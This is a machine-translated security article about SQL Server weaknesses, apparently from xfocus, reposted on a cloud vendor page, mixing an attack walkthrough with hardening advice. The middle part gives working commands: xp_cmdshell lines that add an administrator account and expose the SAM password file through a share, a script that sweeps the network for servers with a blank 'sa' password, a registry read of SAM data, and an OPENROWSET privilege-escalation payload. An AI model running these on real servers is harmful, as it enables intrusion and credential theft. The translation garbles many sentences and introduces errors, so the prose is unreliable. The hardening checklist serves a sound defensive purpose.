Some security issues with SQL Server

Source: Internet
Author: User
Tags empty iis mail mysql client pack require safe mode firewall
server| Security | Questions about security issues with SQL Server

By xundi< Security Focus >
Xundi1@21cn.com
www.xfocus.org

At present, there are many ways to invade NT Server, such as exploiting the vulnerabilities of IIS, but
People don't know notice no, actually through the SQL database server associated with the NT Server
Examples are also very proportional to a means. You can refer to one of the following news reports:
http://www.vnunet.com/News/1110938.
Some sites herbless intrusion, such as the legoland.co.uk site, are via SQL Server
Invasion and gain control over the system and destroy it. So the protection of the SQL Server is essential
Small, here I sorted out some loopholes for everyone to reference, laughed, laughed.

----------------------------------------------------------------
Let's take a look at the network protocol libraries supported by the SQL Server program:

----------------------------------------------------------------
| SQL Server Network Protocol Libraries |
----------------------------------------------------------------
| Protocol library| Vulnerabilities that may exist | Whether to encrypt |
----------------------------------------------------------------
| Named Pipes | --Use NT SMB ports (tcp139,udp137, | no |
| (Famous pipe) | 138) To communicate, these can be through | |
| | Firewall control, but if the internal network can | |
| | Random access is also a very small defect | |
| | --User name, password and data not added | |
| | Transmission, anyone can come through sniffer | |
| | For data capture. | |
----------------------------------------------------------------
| IP Sockets | --Open 1433 by default, you can use | No |
| | Scanner to view this port. | |
| | Data can be intercepted by sniffer.
----------------------------------------------------------------
| Multi-Protocol | --The client needs to support NT RPCs; in different | is |
| | Kind of environment may cause problems. | |
| | --The TCP random port is used by default, but | |
| | Firewall for Port map fixed implementation (parameter | |
| | See KB Q164667). | |
| | --need to pay attention to the choice of encryption options, default | |
| | is not selected for this option. |
----------------------------------------------------------------
| NWLink | --there is the risk of interception of data by sniffer | No |
----------------------------------------------------------------
| AppleTalk (ADSP) | --there is the risk of interception of data by sniffer | No |
----------------------------------------------------------------
| Banyan Vines | --there is the risk of interception of data by sniffer | No |
----------------------------------------------------------------

The general recommended use is: If you can use Named Pipes on Integrated (NT) security or
Multi-Protocol, then you use these protocol libraries and, if possible, try to use Multi-Protocol
and enabling encryption options. If you can't use the top few, then use the IP Sockets protocol and change
Its default port and check the system at any time to ensure that no sniffer exists. Also, consider using a Web service
Service or COM component as the business object layer of the application, and in the middle tier and SQL Server
Use secure channel in order. There are a number of third-party products that can encrypt this communication.

-----------------------------------------------------------------------
Let's talk about the various security modes of SQL Server and how they work.

Security mode defines how some SQL Server can authenticate users who want to use their services, see the following
SQL Server 6.5 security mode and some descriptions and differences in SQL Server 7.0 that have changed:

-------------------------------------------------------------------
| Safe Mode | SQL Server 6.5 | SQL Server 7.0 Change Place |
-------------------------------------------------------------------
| Standard | --Login definition in SQL Server | --Separate standard mode in SQL server|
| Standard Mode | And given the password. | No use. |
| | --sql server's login account with | |
| | WINDOW NT Separate | |
-------------------------------------------------------------------
| Integrated |-using Security Manager SQL's Ledger | --become "Windows NT only" here |
| Integrated Mode | Households. | mode. |
| |-users are connected to SQL server| --only works under NT system, not in Win9x |
| | Does not require a specific separate login and | Support. |
| | Password. | |
| | |-passwords are never stored in applications | --can be directly integrated into NT groups for easy |
| | , not in plaintext in the network | Management, (note there is a builtin group in |
| | Transmission. | Generated on the local system). |
| |-sql server can use NT's | |
| | Authentication method to authenticate the user and | |
| | Can be used, such as account expiration. | |
| | |-NEED named pipe or multi-| |
| | Protocol Library. | |
--------------------------------------------------------------------
| Mixed |-Provide some special for the way above | --Become SQL Server and Windows NT |
| mixed Way | Levy but there is a retreat to the thing is the customer | mode. |
| | A trusted connection cannot be established on the end. | --Try to use window NT only mode | |
--------------------------------------------------------------------

Login is only the first step, once the user logs in, the user must access the independent database, to make the above
, it is necessary to have a table for each user's database in the sysusers. So safe
Please be aware that there is a "guest" account in your database and that it will not be given when you are not paying attention.
Some people visit your database.

Detailed you can refer to Microsoft's site:

Http://www.microsoft.com/technet/SQL/Technote/secure.asp


---------------------------------------------------------------------

For some security issues with SQL Server:

There is an "SA" account, the password is empty, and the password is a member of the SQL Server security module, we
Can be killed by xp_cmdshell stored procedure (extended stored procedures)
To make an operation such as:

xp_cmdshell "NET user testuser Ugothacked/add"
Then in:
xp_cmdshell "net localgroup Administrators Testuser/add"

This allows an attacker to successfully add a user to the SQL Server.

Of course, remote, the general need to have 1433 open, through the MySQL client connection.

Of course you can also use:

xp_cmdshell "rdisk/s-"

method so that the information is rebuilt in the \winnt\repair directory without prompting the user. And then
After a Sam backup, an attacker can establish an SMB connection to a share or establish a connection:

xp_cmdshell "net share Getsam=c:\winnt\repair"

Use the share to get the file, and then use L0phtCrack to run it. If the SMB port is blocked by a firewall
Controlled, or closed, an attacker can also copy sam._ files to the Web directory for anonymous browsers
Download. If someone does not have IIS, why don't you use TFTP:.

OK, through this controlled SQL Server server, an attacker can find the inside of the network
Other machines to expand their gains, the following is an SQL script that enumerates other SQL servers in the network
Example of an empty account ' sa ':

-----------------------------------------------------------------------

--Create temp table to store enumerated servers

SET NOCOUNT on

CREATE TABLE #temp (shelldump varchar (255))

INSERT #temp EXEC xp_cmdshell ' osql-l '

DECLARE @current_server varchar (255), @conn_string varchar (255)

DECLARE sql_cursor cursor for SELECT * from #temp

OPEN sql_cursor FETCH NEXT from Sql_cursor into @current_server

--loop through potential targets and check for null SA accounts

--If target is vulnerable, version information would be displayed

While @ @FETCH_STATUS = 0

BEGIN

If @current_server <> ' Servers: '

BEGIN

SELECT @current_server = RTrim (LTrim (@current_server))

Select @conn_string = ' exec xp_cmdshell ' osql-s ' + @current_server + '-usa-p-Q ' SELECT @ @version "'

PRINT ' Attempting connection to server: ' + @current_server

EXECUTE (@conn_string)

PRINT ' ===================================================================== '

End

FETCH NEXT from Sql_cursor into @current_server

End

--clean up

Close Sql_cursor

Deallocate sql_cursor

DROP TABLE #TEMP

----------------------------------------------------------------------

Of course, some people may also turn off xp_cmdshell extended stored procedure (extended stored procedures),
We can also use the following methods:

Xp_regread ' HKEY_LOCAL_MACHINE ', ' Security\sam\domains\account ', ' F '

If the MSSQLServer service is running under the Local System account and if SYSKEY is not installed on the system, above
Call to return the encrypted password or SID in the registry.

--------------------------------------------------------------------------

Another loophole, is about adhoc heterogenous queries to do the promotion of rights, please see below Microsoft
Description of: http://www.microsoft.com/technet/security/bulletin/fq00-014.asp

For the above vulnerabilities, you can use the following xploit to get the right promotion:

SELECT * from OPENROWSET (' SQLOLEDB ', ' Trusted_connection=yes;data source=myserver ',
' SET fmtonly off execute master. xp_cmdshell "dir c:\")

This is a kind of people like to do other commands, you think.

---------------------------------------------------------------------------

There is a recent vulnerability: Extended Stored Procedure Parameter parsing (Extended storage
Process parameter parsing) vulnerability, details at this URL are described:
Http://www.microsoft.com/technet/security/bulletin/ms00-092.asp.

The main problem is to provide an API function Srv_paraminfo () in MSD, which is used to extend stored procedure tuning
Explaining the depth of a parameter, such as:

exec < stored procedure name > < parameter 1&gt, < parameter 2>
To query the directory tree for "C:\Winnt", you can express the following:
exec xp_dirtree ' C:\Winnt '

But without checking the length of each argument, passing a fairly long string, there is a overwrite of the other stack
parameter may cause a buffer overflow.

The process that is now known is as follows:
The extended stored procedures that are currently known to be affected are as follows:

1, Xp_peekqueue (Xpqueue.dll)
Xp_printstatements (Xprepl.dll)

Passing an extremely long string to the first parameter overrides the return address saved by the exception handler.

2, Xp_proxiedmetadata (Xprepl.dll)

The stored procedure uses 4 parameters. Passing an extra long string to the second argument overrides the exception
The return address saved by the program.

3, xp_setsqlsecurity (Xpstar.dll)

The stored procedure uses 4 parameters. Passing an extra long string to the third argument causes the entire SQL
The server process terminates immediately.

4, xp_displayparamstmt (Xprepl.dll)
Xp_enumresultset (Xprepl.dll)
Xp_showcolv (Xprepl.dll)
XP_UPDATECOLVBM (Xprepl.dll)

Passing an extremely long string to the first argument will result in an illegal operation and overwrite the return saved by the exception handler
return address.

Here's a tricky thing to tell you if you want to know that these extended stored procedures call that write DLL
File, you can do the following, such as:

Select O.name,c.text from dbo.syscomments C, dbo.sysobjects o where c.id = O.id and O.name
= ' Xp_peekqueue '

So you can get the DLL that calls this extended stored procedure, and if Microsoft doesn't have a patch, you
Temporarily rename this DLL file, of course, some DLL file calls several extended stored procedures, can not blindly change,
Otherwise you will not be able to use the other, you need to use the following actions to know the DLL calls those extended stored procedures:

Select O.name,c.text from dbo.syscomments C, dbo.sysobjects o where c.id = o.id and C.text = ' Xpqueue.dll '

Fortunately, Microsoft out of the patch, you can go to the following places to find, do not have to find a DLL program, hehe:

Http://support.microsoft.com/support/sql/xp_security.asp

This vulnerability @stake discovery and provides demo test code that you can find here:

Http://www.atstake.com/research/advisories/2000/sqladv2-poc.c

--------------------------------------------------------------------------

OK, of course SQL Server also has some other vulnerabilities that are relatively minor, such as the ISS Discovery Administrator
The LOGIN ID is stored in the registry, its encryption method is relatively simple, easy to obtain, details
Please see: http://xforce.iss.net/alerts/advise45.php3. Everyone can go to the other
Place to look for.

---------------------------------------------------------------------

Some security recommendations for SQL Server systems:

--Ensure the latest security patches are as follows:
Windows NT 4.0-service Pack 6a

SQL Server 6.5-service Pack 5a

SQL Server 7.0-service Pack 2. (Various Hotfixes-check
Http://www.microsoft.com/download)

SQL Server 2000-hotfix S80233i.exe (Intel)
Of course, everyone should pay close attention to Microsoft's security bulletin.

--Do not use port 1433 in IP sockets, if you use multi-protocol also please
Modify the port.

-Don't embed the ' sa ' password in any application like Vb/delphi apps, or a
Global.asa file, because "sa" is a default password for SQL Server, its permissions
Similar to the Administrator account in the Windows NT system, and the password is blank.

--Change the password for the ' sa ' and ' probe ' account.

--Ensure that SQL Server errors are logged on the NTFS system.

If you don't need xp_cmdshell (use sp_dropextendedproc ' xp_cmdshell ')
Do not leave xp_cmdshell extended stored proc (extended stored procedures) in service
The device. Enter in any isql window:
Use master
Sp_dropextendedproc ' xp_cmdshell '

--Discard unwanted OLE automatic stored procedures, and of course some features in the Enterprise Manager
Will not work, and these procedures include the following:

sp_OACreate sp_OADestroy

sp_OAGetErrorInfo sp_OAGetProperty

sp_OAMethod sp_OASetProperty

sp_OAStop

--Remove unwanted registry access procedures as follows:

Xp_regaddmultistring

Xp_regdeletekey

Xp_regdeletevalue

Xp_regenumvalues

Xp_regread

Xp_regremovemultistring

Xp_regwrite

--Remove other system stored procedures, if you think you still have a threat, of course
Be careful to drop these processes, you can test on the test machine to ensure that you are normal
The system can do the work, including:

sp_bindsession sp_cursor Sp_cursorclose
Sp_cursorfetch sp_cursoropen sp_cursoroption
Sp_getbindtoken Sp_getmbcscharlen sp_IsMBCSLeadByte
sp_OACreate sp_OADestroy sp_OAGetErrorInfo
sp_OAGetProperty sp_OAMethod sp_OASetProperty
sp_OAStop sp_replcmds sp_replcounters
Sp_repldone Sp_replflush Sp_replstatus
Sp_repltrans sp_sdidebug Xp_availablemedia
xp_cmdshell xp_deletemail Xp_dirtree
Xp_dropwebtask Xp_dsninfo Xp_enumdsn
Xp_enumerrorlogs xp_enumgroups Xp_enumqueuedtasks
Xp_eventlog xp_findnextmsg xp_fixeddrives
Xp_getfiledetails Xp_getnetname Xp_grantlogin
Xp_logevent Xp_loginconfig xp_logininfo
Xp_makewebtask xp_msver Xp_perfend
Xp_perfmonitor Xp_perfsample Xp_perfstart
Xp_readerrorlog xp_readmail Xp_revokelogin
Xp_runwebtask xp_schedulersignal xp_sendmail
Xp_servicecontrol xp_snmp_getstate Xp_snmp_raisetrap
xp_sprintf xp_sqlinventory Xp_sqlregister
xp_sqltrace xp_sscanf xp_startmail
Xp_stopmail Xp_subdirs xp_unc_to_drive

--Remove the guest user from the database.
--Turn off SQL Mail compatibility to prevent the transmission of some Trojan virus and so on.
--Set up a task handler to run the following program at timed intervals:

FINDSTR/C: "Login Failed" \mssql7\log\*.* "

Redirect to other files or mail to administrator mailbox.

-Frequently check for accounts with blank passwords:

Use master
Select name,
Password
From syslogins
where password is null
Order BY name

--Check all stored procedures and extended stored procedure access rights that do not require ' sa ' permission:

Use master
Select Sysobjects.name
From sysobjects, sysprotects
Where sysprotects.uid = 0
and Xtype in (' X ', ' P ')
and sysobjects.id = Sysprotects.id
Order BY name


--Ensure that the transport information for SQL Server is in an isolated network segment.


Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.